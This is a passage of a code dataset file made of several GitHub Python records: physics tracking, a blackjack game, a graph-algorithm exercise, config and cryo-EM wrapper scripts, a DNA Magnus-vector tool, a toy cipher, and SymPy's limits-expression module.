/ (p.p0c * echarge * p.beta0)\n * self.length\n )\n\n absc_values = p._m.linspace(\n self.z0, self.z0 + self.dz * (n_prof_points - 1), n_prof_points\n )\n\n if self.method == 0:\n ld_factor = p._m.interp(\n p.zeta, absc_values, self.line_density_profile\n )\n elif self.method == 1:\n cs = CubicSpline(absc_values, self.line_density_profile)\n ld_factor = cs(p.zeta)\n else:\n ld_factor = 1\n\n fact_kick *= self.number_of_particles * ld_factor\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n","repo_name":"xsuite/xtrack","sub_path":"ducktrack/be_beamfields/spacecharge.py","file_name":"spacecharge.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"73"} +{"seq_id":"71067095275","text":"import random\n\n\ndef deal_card():\n \"\"\"Returns a random card from the deck\"\"\"\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n card = random.choice(cards)\n return card\n\n\ndef calculate_score(cards):\n \"\"\"Take a list of cards and return score calculated\"\"\"\n if sum(cards) == 21 and len(cards) == 2:\n return 0\n if 11 in cards and sum(cards) > 21:\n cards.remove(11)\n cards.append(1)\n return sum(cards)\n\n\nuser_cards = []\ndealer_cards = []\nis_game_over = False\n\nfor _ in range(2):\n user_cards.append(deal_card())\n dealer_cards.append(deal_card())\n\nuser_score = calculate_score(user_cards)\ndealer_score = calculate_score(dealer_cards)\n\nprint(f\"Your cards: {user_cards}, current score: {user_score}\")\nprint(f\"Dealers cards: {dealer_cards[0]}\")\n\nif user_score == 0 or dealer_cards == 0 or user_score > 21:\n is_game_over = True\n\nwhile dealer_score != 0 and dealer_score < 17:\n dealer_cards.append(deal_card())\n dealer_score = calculate_score(dealer_cards)\n\n# import random\n\n# cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n\n# player_cards = []\n# dealer_cards = []\n\n# def deal_cards():\n# for i in range(2):\n# player_cards.append(random.choice(cards))\n# dealer_cards.append(random.choice(cards))\n# player_count = sum(player_cards)\n# dealer_count = sum(dealer_cards)\n# print(\"Players cards: \",\n# str(player_cards) + \" which equals \" + str(player_count))\n# print(\"Dealers cards: \",\n# str(dealer_cards) + \" which equals \" + str(dealer_count))\n# player_count = sum(player_cards)\n# dealer_count = sum(dealer_cards)\n# while dealer_count < 17:\n# dealer_cards.append(random.choice(cards))\n# dealer_count = sum(dealer_cards)\n# print(\"Dealers hits: \",\n# str(dealer_cards) + \" which equals \" + str(dealer_count))\n# while player_count < 17:\n# player_cards.append(random.choice(cards))\n# player_count = sum(player_cards)\n# print(\"Dealers hits: \",\n# str(player_cards) + \" which equals \" + str(player_count))\n\n# deal_cards()\n","repo_name":"Jonjo-Jefferson/100-days-of-python","sub_path":"days/13_simple_blackjack.py","file_name":"13_simple_blackjack.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20147924467","text":"# -*- coding: utf-8 -*-\n\"\"\"\n1334. Find the City With the Smallest Number of Neighbors at a Threshold Distance\n\"\"\"\n\nclass Solution(object):\n def findTheCity(self, n, edges, distanceThreshold):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :type distanceThreshold: int\n :rtype: int\n \"\"\"\n inf = int(1e6)+1\n M = [[ inf for i in range(n)] for j in range(n)]\n for f, t, w in edges:\n M[f][t] = w\n M[t][f] = w\n for i in range(n):\n M[i][i] = 0\n for mid in range(n):\n for f in range(n):\n for t in range(n):\n M[f][t] = min(M[f][t], M[f][mid]+M[mid][t])\n M[t][f] = M[f][t]\n minimum = inf\n ind = -1\n for new_ind, endCity in enumerate(M):\n new_minimum = len([1 for i in endCity if i <= distanceThreshold])\n if new_minimum <= minimum:\n minimum = new_minimum\n ind = new_ind\n return ind\nn = 6\nedges =[[2,3,7],[2,5,8],[0,2,8],[4,5,5],[1,5,10],[3,4,3],[0,5,9],[1,2,1]]\ndistanceThreshold = 3269\noutput = Solution().findTheCity(n, edges, distanceThreshold)","repo_name":"yoyau/LeetCodePractice","sub_path":"python/G_lc_1334_floyedWarshall.py","file_name":"G_lc_1334_floyedWarshall.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37609949174","text":"import os\nimport sys\nimport ConfigParser\n\nfrom pybrightcove import __version__\n\n\nUSER_CONFIG_PATH = os.path.expanduser('~/.pybrightcove')\nCONFIG_PATH = '/etc/pybrightcove.cfg'\nCONFIG_LOCATIONS = [CONFIG_PATH, USER_CONFIG_PATH]\nUSER_AGENT = 'PyBrightcove/%s (%s)' % (__version__, sys.platform)\n\n\ndef has_option(section, name):\n \"\"\"\n Wrapper around ConfigParser's ``has_option`` method.\n \"\"\"\n cfg = ConfigParser.SafeConfigParser({\"working_dir\": \"/tmp\", \"debug\": \"0\"})\n cfg.read(CONFIG_LOCATIONS)\n return cfg.has_option(section, name)\n\n\ndef get(section, name):\n \"\"\"\n Wrapper around ConfigParser's ``get`` method.\n \"\"\"\n cfg = ConfigParser.SafeConfigParser({\"working_dir\": \"/tmp\", \"debug\": \"0\"})\n cfg.read(CONFIG_LOCATIONS)\n val = cfg.get(section, name)\n return val.strip(\"'\").strip('\"')\n\n","repo_name":"studionow/pybrightcove","sub_path":"pybrightcove/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"73"} +{"seq_id":"1747060166","text":"#!/usr/bin/env python3\n\"\"\"/***************************************************************************\n *\n * Authors: Ruben Sanchez Garcia rsanchez@cnb.csic.es\n *\n * CSIC\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n * 02111-1307 USA\n *\n * All comments concerning this program package may be sent to the\n * e-mail address 'xmipp@cnb.csic.es'\n ***************************************************************************/\n\"\"\"\n\nimport os\nimport sys\n\nfrom xmipp_base import XmippScript\nimport xmippLib\n\n\nclass ScriptMicrographCleanerEm(XmippScript):\n _conda_env = 'xmipp_deepEMhancer'\n\n def __init__(self):\n\n XmippScript.__init__(self)\n\n def getDoubleParamWithDefault(self, paramName, conditionFun= lambda x: False, defaultVal=None):\n if self.checkParam(paramName):\n x = self.getDoubleParam(paramName)\n if conditionFun(x):\n return defaultVal\n return x\n else:\n return defaultVal\n\n def defineParams(self):\n self.addUsageLine('DeepEMhancer. Apply a CCN to post-process an EM volume to obtain a masked and sharpened-like volume in an automatic fashion\\n.'\n 'Normalization of the input volume is key, so unmasked volumes should be provided as input. There are 3 normalization options: \\n'\n '1) Automatic (default)\\n'\n '2) Providing the statistics of the noise'\n '3) Using a binary mask')\n ## params\n self.addParamsLine(' -i : input volume to postprocess (or half map 1). Only mrc format allowed ')\n self.addParamsLine(' [-i2 ] : input half map 2. Only mrc format allowed ')\n\n self.addParamsLine(' -o : output fname to save postprocessed volume. Only mrc format allowed ')\n\n self.addParamsLine(' [ --sampling_rate ] : (optional) The sampling rate of the volume. If not provided, it will be read from -i header')\n\n self.addParamsLine(' [ --checkpoint ] : (optional) deep learning model filename. If not provided, default model will be used')\n\n self.addParamsLine(' [ --cleaningStrengh ] : (optional) Max size of connected componemts to remove 0 ]: Failure threshold. Fraction of the micrograph predicted as contamination to ignore predictions. '+\n '. Ranges 0..1. Default 0.8')\n\n self.addParamsLine('[ -g ] : GPU id to employ. Default 0. use -1 for CPU-only computation or \"all\" to use all devices found in '\n 'CUDA_VISIBLE_DEVICES (option for slurm)')\n self.addParamsLine('[ -b ] : Number of cubes to process simultaneously. Lower it if CUDA Out Of Memory error happens and increase it if low GPU performance observed')\n\n self.addParamsLine(' [--binaryMask ] : Normalization-> Binary mask volume to compute stats for normalization. Only mrc format allowed ')\n self.addParamsLine(' [--noise_stats_mean ] : Normalization-> Noise stats mean for normalization ')\n self.addParamsLine(' [--noise_stats_std ] : Normalization-> Noise stats standard deviation for normalization ')\n\n\n ## examples\n self.addExampleLine('xmipp_deep_volume_postprocessing -i path/to/inputVol.mrc -o path/to/outputVol.mrc ')\n \n def run(self):\n\n\n params= \" -i %s \" % self.getParam('-i')\n if self.checkParam('-i2'):\n params += \" -i2 %s \" % self.getParam('-i2')\n\n params += \" -o %s \" % self.getParam('-o')\n\n if self.checkParam('--checkpoint'):\n params += \" --deepLearningModelPath %s \"%os.path.expanduser(self.getParam(\"--checkpoint\"))\n else:\n params += \" --deepLearningModelPath %s \"%XmippScript.getModel(\"deepEMhancer\", \"production_checkpoints/deepEMhancer_tightTarget.hd5\")\n\n if self.checkParam('--sampling_rate'):\n params += \" --samplingRate %f \" % self.getDoubleParam('--sampling_rate')\n\n if self.checkParam('--binaryMask'):\n params += \" --binaryMask %s \" % (os.path.abspath(self.getParam('--binaryMask')))\n\n elif self.checkParam('--noise_stats_mean'):\n params += \" --noiseStats %f %f \" % (self.getDoubleParam('--noise_stats_mean'), self.getDoubleParam('--noise_stats_std'))\n\n if self.checkParam('--cleaningStrengh'):\n params += \" --cleaningStrengh %f \" % self.getDoubleParamWithDefault('--cleaningStrengh', defaultVal=-1)\n\n params+= \"-g %s \"%self.getParam(\"-g\")\n params+= \"-b %s \"%self.getParam(\"-b\")\n\n cmd= \"deepemhancer\"\n print( cmd+\" \"+params)\n self.runCondaCmd(cmd, params)\n\n\nif __name__ == '__main__':\n '''\nscipion xmipp_deep_volume_postprocessing -g 0\n '''\n exitCode=ScriptMicrographCleanerEm().tryRun()\n sys.exit(exitCode)\n \n","repo_name":"I2PC/xmipp","sub_path":"src/xmipp/applications/scripts/deep_volume_postprocessing/deep_volume_postprocessing.py","file_name":"deep_volume_postprocessing.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"73"} +{"seq_id":"42004096375","text":"import numpy as np\nfrom numpy import empty\nnp.set_printoptions(threshold=np.inf)\n\n\n\n\ndef mainmagnus(stri):\n # Initial DNA Sequence (can be upper or lower case)\n inputfilename='testb'+stri+'.txt'\n file = open(inputfilename, \"r\")\n dna = file.read()\n\n #Output file\n outputfilename='bacoutput'+stri+'.txt'\n output = open(outputfilename, \"w\")\n\n #testing\n #dna='accccgc'\n\n #remove numbers and spaces, and linebreaks\n dna = dna.replace(\" \",\"\")\n dna = dna.replace('\\n', '').replace('\\r', '')\n\n dna = ''.join([i for i in dna if not i.isdigit()])\n dna = dna.upper()\n\n output.write('DNA Sequence:\\n')\n output.write(dna+'\\n')\n\n #Length of dna\n dnalength = len(dna)\n\n output.write('DNA Length:\\n')\n output.write(str(dnalength)+'\\n')\n\n #Length of each window (i.e. k for k-mer)\n N=5\n output.write('Window Length:\\n')\n output.write(str(N)+'\\n')\n\n #Length of Magnus Vector\n mvl = (4**(N+1)-4)/3\n\n output.write('Length of Magnus Vector (for each window):\\n')\n output.write(str(mvl)+'\\n')\n\n #Number of Windows\n numwin=dnalength//N\n output.write('Number of Windows:\\n')\n output.write(str(numwin)+'\\n')\n\n #Initialize Array of Windows\n winarray = empty([numwin,mvl])\n #print(winarray)\n\n\n\n #print(dnabase4)\n\n # bottom-up, dynamic programming solution using a single array\n #Reference: https://stackoverflow.com/questions/6877249/find-the-number-of-occurrences-of-a-subsequence-in-a-string\n\n def num_subsequences(seq, sub):\n m, n = len(seq), len(sub)\n table = [0] * n\n for i in xrange(m):\n previous = 1\n for j in xrange(n):\n current = table[j]\n if seq[i] == sub[j]:\n table[j] += previous\n previous = current\n return table[n-1] if n else 1\n\n #Change base\n #Reference: https://stackoverflow.com/questions/2267362/how-to-convert-an-integer-in-any-base-to-a-string\n def numberToBase(n, b):\n if n == 0:\n return '0'\n digits = ''\n while n:\n digits+=str(int(n % b))\n n //= b\n return digits[::-1]\n\n for globalcounter in range(0,numwin):\n startindex=globalcounter*N\n endindex=startindex+N\n #Base 4 DNA\n dnabase4 = ''\n\n #Magnus Vector\n magnusvec = [0] * mvl\n\n for i in range(startindex,endindex):\n if (dna[i]=='A'):\n dnabase4+='0'\n elif (dna[i]=='C'):\n dnabase4+='1'\n elif(dna[i]=='G'):\n dnabase4+='2'\n elif(dna[i]=='T' or dna[i]=='U'):\n dnabase4+='3'\n else:\n print('DNA Sequence contains unallowed letters.')\n break\n\n counter = 0\n maxds = 4**N\n while counter=0:\n #print(s)\n ps = (4**len(s)-4)/3 +ds + 1\n #print(ps)\n alphas = num_subsequences(dnabase4,s)\n magnusvec[ps-1]=alphas\n s = '0'+s\n counter+=1\n\n\n\n winarray[globalcounter]=magnusvec\n #end loop\n\n #print(\"Magnus Vectors for R=Z:\")\n #print(winarray)\n\n\n summagnus=[0]*mvl\n for i in range(0,len(winarray)):\n summagnus=summagnus+winarray[i]\n meanmagnus=summagnus/numwin\n output.write('Mean Magnus Vector\\n')\n output.write(str(meanmagnus)+'\\n')\n\n output.close()\n\n npyname='mean'+stri\n np.save(npyname,meanmagnus)\n\n\n\n\n\n\nfor j in range(1,2):\n mainmagnus(str(j))\n\n\n######\n#Short Magnus Window\n'''\nshortmagnusvec=[mvl]\nfor i in range(0,len(magnusvec)):\n if magnusvec[i]!=0:\n shortmagnusvec.append(i+1)\n\nprint('Short Magnus Vector for R=Z:')\nprint(shortmagnusvec)\n'''\n\n#Mod 2 Magnus\n'''\ndef reduceMod2(l):\n return [i % 2 for i in l]\n\n\nmagnusvecmod2=reduceMod2(magnusvec)\nprint(\"Magnus Vector for R=Z/2:\")\nprint(magnusvecmod2)\n\nshortmagnusvecmod2=[mvl]\nfor i in range(0,len(magnusvecmod2)):\n if magnusvecmod2[i]!=0:\n shortmagnusvecmod2.append(i+1)\n\nprint('Short Magnus Vector for R=Z/2:')\nprint(shortmagnusvecmod2)\n'''","repo_name":"wuchengyuan88/Magnus-Representation","sub_path":"magnusvector.py","file_name":"magnusvector.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4175543594","text":"#!bin/bash/python3\n#Playful Cipher\n\ndef playful_enc():\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n plaintext = \"\"\n enc_key = \"\"\n enc_string = \"\"\n\n #Enter a message you wish to encypt\n plaintext = input(\"Plaintext Message: \")\n plaintext = plaintext.lower()\n\n #Length of the plain text\n ptxt_length = len(plaintext)\n\n #Enter an ecryption key\n enc_key = input(\"Encryption Key: \")\n plaintext = plaintext.lower()\n\n #Expands the key to make it longer than the plaintext\n expanded_key = enc_key\n expanded_key_length = len(expanded_key)\n\n while expanded_key_length < ptxt_length:\n # Adds another repetition of the encryption key\n expanded_key = expanded_key + enc_key\n expanded_key_length = len(expanded_key)\n \n key_position = 0 \n\n for letter in plaintext:\n if letter in alphabet:\n position = alphabet.find(letter)\n # moves along key and finds the characters value\n key_character = expanded_key[key_position]\n key_character_position = alphabet.find(key_character)\n key_position = key_position + 1\n # changes the original of the input string character\n new_position = position + key_character_position\n if new_position > 26:\n new_position = new_position - 26\n new_character = alphabet[new_position]\n enc_string = enc_string + new_character\n else:\n enc_string = enc_string + letter\n return(enc_string)\n\n#Reverse cipher\nreverse = playful_enc()[::-1]\n\n#Reverse cipher into sha3_512 hash\nimport hashlib\n\nresult = hashlib.sha3_512(reverse.encode())\n\nprint (result.hexdigest())\n","repo_name":"Cyberwally/playfulcipher","sub_path":"playful.py","file_name":"playful.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18025344920","text":"from sympy.core.add import Add\nfrom sympy.core.containers import Tuple\nfrom sympy.core.expr import Expr\nfrom sympy.core.function import AppliedUndef, UndefinedFunction\nfrom sympy.core.mul import Mul\nfrom sympy.core.relational import Equality, Relational\nfrom sympy.core.singleton import S\nfrom sympy.core.symbol import Symbol, Dummy\nfrom sympy.core.sympify import sympify\nfrom sympy.functions.elementary.piecewise import (piecewise_fold,\n Piecewise)\nfrom sympy.logic.boolalg import BooleanFunction\nfrom sympy.matrices.matrices import MatrixBase\nfrom sympy.sets.sets import Interval, Set\nfrom sympy.sets.fancysets import Range\nfrom sympy.tensor.indexed import Idx\nfrom sympy.utilities import flatten\nfrom sympy.utilities.iterables import sift, is_sequence\nfrom sympy.utilities.exceptions import sympy_deprecation_warning\n\n\ndef _common_new(cls, function, *symbols, discrete, **assumptions):\n \"\"\"Return either a special return value or the tuple,\n (function, limits, orientation). This code is common to\n both ExprWithLimits and AddWithLimits.\"\"\"\n function = sympify(function)\n\n if isinstance(function, Equality):\n # This transforms e.g. Integral(Eq(x, y)) to Eq(Integral(x), Integral(y))\n # but that is only valid for definite integrals.\n limits, orientation = _process_limits(*symbols, discrete=discrete)\n if not (limits and all(len(limit) == 3 for limit in limits)):\n sympy_deprecation_warning(\n \"\"\"\n Creating a indefinite integral with an Eq() argument is\n deprecated.\n\n This is because indefinite integrals do not preserve equality\n due to the arbitrary constants. If you want an equality of\n indefinite integrals, use Eq(Integral(a, x), Integral(b, x))\n explicitly.\n \"\"\",\n deprecated_since_version=\"1.6\",\n active_deprecations_target=\"deprecated-indefinite-integral-eq\",\n stacklevel=5,\n )\n\n lhs = function.lhs\n rhs = function.rhs\n return Equality(cls(lhs, *symbols, **assumptions), \\\n cls(rhs, *symbols, **assumptions))\n\n if function is S.NaN:\n return S.NaN\n\n if symbols:\n limits, orientation = _process_limits(*symbols, discrete=discrete)\n for i, li in enumerate(limits):\n if len(li) == 4:\n function = function.subs(li[0], li[-1])\n limits[i] = Tuple(*li[:-1])\n else:\n # symbol not provided -- we can still try to compute a general form\n free = function.free_symbols\n if len(free) != 1:\n raise ValueError(\n \"specify dummy variables for %s\" % function)\n limits, orientation = [Tuple(s) for s in free], 1\n\n # denest any nested calls\n while cls == type(function):\n limits = list(function.limits) + limits\n function = function.function\n\n # Any embedded piecewise functions need to be brought out to the\n # top level. We only fold Piecewise that contain the integration\n # variable.\n reps = {}\n symbols_of_integration = {i[0] for i in limits}\n for p in function.atoms(Piecewise):\n if not p.has(*symbols_of_integration):\n reps[p] = Dummy()\n # mask off those that don't\n function = function.xreplace(reps)\n # do the fold\n function = piecewise_fold(function)\n # remove the masking\n function = function.xreplace({v: k for k, v in reps.items()})\n\n return function, limits, orientation\n\n\ndef _process_limits(*symbols, discrete=None):\n \"\"\"Process the list of symbols and convert them to canonical limits,\n storing them as Tuple(symbol, lower, upper). The orientation of\n the function is also returned when the upper limit is missing\n so (x, 1, None) becomes (x, None, 1) and the orientation is changed.\n In the case that a limit is specified as (symbol, Range), a list of\n length 4 may be returned if a change of variables is needed; the\n expression that should replace the symbol in the expression is\n the fourth element in the list.\n \"\"\"\n limits = []\n orientation = 1\n if discrete is None:\n err_msg = 'discrete must be True or False'\n elif discrete:\n err_msg = 'use Range, not Interval or Relational'\n else:\n err_msg = 'use Interval or Relational, not Range'\n for V in symbols:\n if isinstance(V, (Relational, BooleanFunction)):\n if discrete:\n raise TypeError(err_msg)\n variable = V.atoms(Symbol).pop()\n V = (variable, V.as_set())\n elif isinstance(V, Symbol) or getattr(V, '_diff_wrt', False):\n if isinstance(V, Idx):\n if V.lower is None or V.upper is None:\n limits.append(Tuple(V))\n else:\n limits.append(Tuple(V, V.lower, V.upper))\n else:\n limits.append(Tuple(V))\n continue\n if is_sequence(V) and not isinstance(V, Set):\n if len(V) == 2 and isinstance(V[1], Set):\n V = list(V)\n if isinstance(V[1], Interval): # includes Reals\n if discrete:\n raise TypeError(err_msg)\n V[1:] = V[1].inf, V[1].sup\n elif isinstance(V[1], Range):\n if not discrete:\n raise TypeError(err_msg)\n lo = V[1].inf\n hi = V[1].sup\n dx = abs(V[1].step) # direction doesn't matter\n if dx == 1:\n V[1:] = [lo, hi]\n else:\n if lo is not S.NegativeInfinity:\n V = [V[0]] + [0, (hi - lo)//dx, dx*V[0] + lo]\n else:\n V = [V[0]] + [0, S.Infinity, -dx*V[0] + hi]\n else:\n # more complicated sets would require splitting, e.g.\n # Union(Interval(1, 3), interval(6,10))\n raise NotImplementedError(\n 'expecting Range' if discrete else\n 'Relational or single Interval' )\n V = sympify(flatten(V)) # list of sympified elements/None\n if isinstance(V[0], (Symbol, Idx)) or getattr(V[0], '_diff_wrt', False):\n newsymbol = V[0]\n if len(V) == 3:\n # general case\n if V[2] is None and V[1] is not None:\n orientation *= -1\n V = [newsymbol] + [i for i in V[1:] if i is not None]\n\n lenV = len(V)\n if not isinstance(newsymbol, Idx) or lenV == 3:\n if lenV == 4:\n limits.append(Tuple(*V))\n continue\n if lenV == 3:\n if isinstance(newsymbol, Idx):\n # Idx represents an integer which may have\n # specified values it can take on; if it is\n # given such a value, an error is raised here\n # if the summation would try to give it a larger\n # or smaller value than permitted. None and Symbolic\n # values will not raise an error.\n lo, hi = newsymbol.lower, newsymbol.upper\n try:\n if lo is not None and not bool(V[1] >= lo):\n raise ValueError(\"Summation will set Idx value too low.\")\n except TypeError:\n pass\n try:\n if hi is not None and not bool(V[2] <= hi):\n raise ValueError(\"Summation will set Idx value too high.\")\n except TypeError:\n pass\n limits.append(Tuple(*V))\n continue\n if lenV == 1 or (lenV == 2 and V[1] is None):\n limits.append(Tuple(newsymbol))\n continue\n elif lenV == 2:\n limits.append(Tuple(newsymbol, V[1]))\n continue\n\n raise ValueError('Invalid limits given: %s' % str(symbols))\n\n return limits, orientation\n\n\nclass ExprWithLimits(Expr):\n __slots__ = ('is_commutative',)\n\n def __new__(cls, function, *symbols, **assumptions):\n from sympy.concrete.products import Product\n pre = _common_new(cls, function, *symbols,\n discrete=issubclass(cls, Product), **assumptions)\n if isinstance(pre, tuple):\n function, limits, _ = pre\n else:\n return pre\n\n # limits must have upper and lower bounds; the indefinite form\n # is not supported. This restriction does not apply to AddWithLimits\n if any(len(l) != 3 or None in l for l in limits):\n raise ValueError('ExprWithLimits requires values for lower and upper bounds.')\n\n obj = Expr.__new__(cls, **assumptions)\n arglist = [function]\n arglist.extend(limits)\n obj._args = tuple(arglist)\n obj.is_commutative = function.is_commutative # limits already checked\n\n return obj\n\n @property\n def function(self):\n \"\"\"Return the function applied across limits.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x\n >>> Integral(x**2, (x,)).function\n x**2\n\n See Also\n ========\n\n limits, variables, free_symbols\n \"\"\"\n return self._args[0]\n\n @property\n def kind(self):\n return self.function.kind\n\n @property\n def limits(self):\n \"\"\"Return the limits of expression.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, i\n >>> Integral(x**i, (i, 1, 3)).limits\n ((i, 1, 3),)\n\n See Also\n ========\n\n function, variables, free_symbols\n \"\"\"\n return self._args[1:]\n\n @property\n def variables(self):\n \"\"\"Return a list of the limit variables.\n\n >>> from sympy import Sum\n >>> from sympy.abc import x, i\n >>> Sum(x**i, (i, 1, 3)).variables\n [i]\n\n See Also\n ========\n\n function, limits, free_symbols\n as_dummy : Rename dummy variables\n sympy.integrals.integrals.Integral.transform : Perform mapping on the dummy variable\n \"\"\"\n return [l[0] for l in self.limits]\n\n @property\n def bound_symbols(self):\n \"\"\"Return only variables that are dummy variables.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, i, j, k\n >>> Integral(x**i, (i, 1, 3), (j, 2), k).bound_symbols\n [i, j]\n\n See Also\n ========\n\n function, limits, free_symbols\n as_dummy : Rename dummy variables\n sympy.integrals.integrals.Integral.transform : Perform mapping on the dummy variable\n \"\"\"\n return [l[0] for l in self.limits if len(l) != 1]\n\n @property\n def free_symbols(self):\n \"\"\"\n This method returns the symbols in the object, excluding those\n that take on a specific value (i.e. the dummy symbols).\n\n Examples\n ========\n\n >>> from sympy import Sum\n >>> from sympy.abc import x, y\n >>> Sum(x, (x, y, 1)).free_symbols\n {y}\n \"\"\"\n # don't test for any special values -- nominal free symbols\n # should be returned, e.g. don't return set() if the\n # function is zero -- treat it like an unevaluated expression.\n function, limits = self.function, self.limits\n # mask off non-symbol integration variables that have\n # more than themself as a free symbol\n reps = {i[0]: i[0] if i[0].free_symbols == {i[0]} else Dummy()\n for i in self.limits}\n function = function.xreplace(reps)\n isyms = function.free_symbols\n for xab in limits:\n v = reps[xab[0]]\n if len(xab) == 1:\n isyms.add(v)\n continue\n # take out the target symbol\n if v in isyms:\n isyms.remove(v)\n # add in the new symbols\n for i in xab[1:]:\n isyms.update(i.free_symbols)\n reps = {v: k for k, v in reps.items()}\n return {reps.get(_, _) for _ in isyms}\n\n @property\n def is_number(self):\n \"\"\"Return True if the Sum has no free symbols, else False.\"\"\"\n return not self.free_symbols\n\n def _eval_interval(self, x, a, b):\n limits = [(i if i[0] != x else (x, a, b)) for i in self.limits]\n integrand = self.function\n return self.func(integrand, *limits)\n\n def _eval_subs(self, old, new):\n \"\"\"\n Perform substitutions over non-dummy variables\n of an expression with limits. Also, can be used\n to specify point-evaluation of an abstract antiderivative.\n\n Examples\n ========\n\n >>> from sympy import Sum, oo\n >>> from sympy.abc import s, n\n >>> Sum(1/n**s, (n, 1, oo)).subs(s, 2)\n Sum(n**(-2), (n, 1, oo))\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, a\n >>> Integral(a*x**2, x).subs(x, 4)\n Integral(a*x**2, (x, 4))\n\n See Also\n ========\n\n variables : Lists the integration variables\n transform : Perform mapping on the dummy variable for integrals\n change_index : Perform mapping on the sum and product dummy variables\n\n \"\"\"\n func, limits = self.function, list(self.limits)\n\n # If one of the expressions we are replacing is used as a func index\n # one of two things happens.\n # - the old variable first appears as a free variable\n # so we perform all free substitutions before it becomes\n # a func index.\n # - the old variable first appears as a func index, in\n # which case we ignore. See change_index.\n\n # Reorder limits to match standard mathematical practice for scoping\n limits.reverse()\n\n if not isinstance(old, Symbol) or \\\n old.free_symbols.intersection(self.free_symbols):\n sub_into_func = True\n for i, xab in enumerate(limits):\n if 1 == len(xab) and old == xab[0]:\n if new._diff_wrt:\n xab = (new,)\n else:\n xab = (old, old)\n limits[i] = Tuple(xab[0], *[l._subs(old, new) for l in xab[1:]])\n if len(xab[0].free_symbols.intersection(old.free_symbols)) != 0:\n sub_into_func = False\n break\n if isinstance(old, (AppliedUndef, UndefinedFunction)):\n sy2 = set(self.variables).intersection(set(new.atoms(Symbol)))\n sy1 = set(self.variables).intersection(set(old.args))\n if not sy2.issubset(sy1):\n raise ValueError(\n \"substitution cannot create dummy dependencies\")\n sub_into_func = True\n if sub_into_func:\n func = func.subs(old, new)\n else:\n # old is a Symbol and a dummy variable of some limit\n for i, xab in enumerate(limits):\n if len(xab) == 3:\n limits[i] = Tuple(xab[0], *[l._subs(old, new) for l in xab[1:]])\n if old == xab[0]:\n break\n # simplify redundant limits (x, x) to (x, )\n for i, xab in enumerate(limits):\n if len(xab) == 2 and (xab[0] - xab[1]).is_zero:\n limits[i] = Tuple(xab[0], )\n\n # Reorder limits back to representation-form\n limits.reverse()\n\n return self.func(func, *limits)\n\n @property\n def has_finite_limits(self):\n \"\"\"\n Returns True if the limits are known to be finite, either by the\n explicit bounds, assumptions on the bounds, or assumptions on the\n variables. False if known to be infinite, based on the bounds.\n None if not enough information is available to determine.\n\n Examples\n ========\n\n >>> from sympy import Sum, Integral, Product, oo, Symbol\n >>> x = Symbol('x')\n >>> Sum(x, (x, 1, 8)).has_finite_limits\n True\n\n >>> Integral(x, (x, 1, oo)).has_finite_limits\n False\n\n >>> M = Symbol('M')\n >>> Sum(x, (x, 1, M)).has_finite_limits\n\n >>> N = Symbol('N', integer=True)\n >>> Product(x, (x, 1, N)).has_finite_limits\n True\n\n See Also\n ========\n\n has_reversed_limits\n\n \"\"\"\n\n ret_None = False\n for lim in self.limits:\n if len(lim) == 3:\n if any(l.is_infinite for l in lim[1:]):\n # Any of the bounds are +/-oo\n return False\n elif any(l.is_infinite is None for l in lim[1:]):\n # Maybe there are assumptions on the variable?\n if lim[0].is_infinite is None:\n ret_None = True\n else:\n if lim[0].is_infinite is None:\n ret_None = True\n\n if ret_None:\n return None\n return True\n\n @property\n def has_reversed_limits(self):\n \"\"\"\n Returns True if the limits are known to be in reversed order, either\n by the explicit bounds, assumptions on the bounds, or assumptions on the\n variables. False if known to be in normal order, based on the bounds.\n None if not enough information is available to determine.\n\n Examples\n ========\n\n >>> from sympy import Sum, Integral, Product, oo, Symbol\n >>> x = Symbol('x')\n >>> Sum(x, (x, 8, 1)).has_reversed_limits\n True\n\n >>> Sum(x, (x, 1, oo)).has_reversed_limits\n False\n\n >>> M = Symbol('M')\n >>> Integral(x, (x, 1, M)).has_reversed_limits\n\n >>> N = Symbol('N', integer=True, positive=True)\n >>> Sum(x, (x, 1, N)).has_reversed_limits\n False\n\n >>> Product(x, (x, 2, N)).has_reversed_limits\n\n >>> Product(x, (x, 2, N)).subs(N, N + 2).has_reversed_limits\n False\n\n See Also\n ========\n\n sympy.concrete.expr_with_intlimits.ExprWithIntLimits.has_empty_sequence\n\n \"\"\"\n ret_None = False\n for lim in self.limits:\n if len(lim) == 3:\n var, a, b = lim\n dif = b - a\n if dif.is_extended_negative:\n return True\n elif dif.is_extended_nonnegative:\n continue\n else:\n ret_None = True\n else:\n return None\n if ret_None:\n return None\n return False\n\n\nclass AddWithLimits(ExprWithLimits):\n 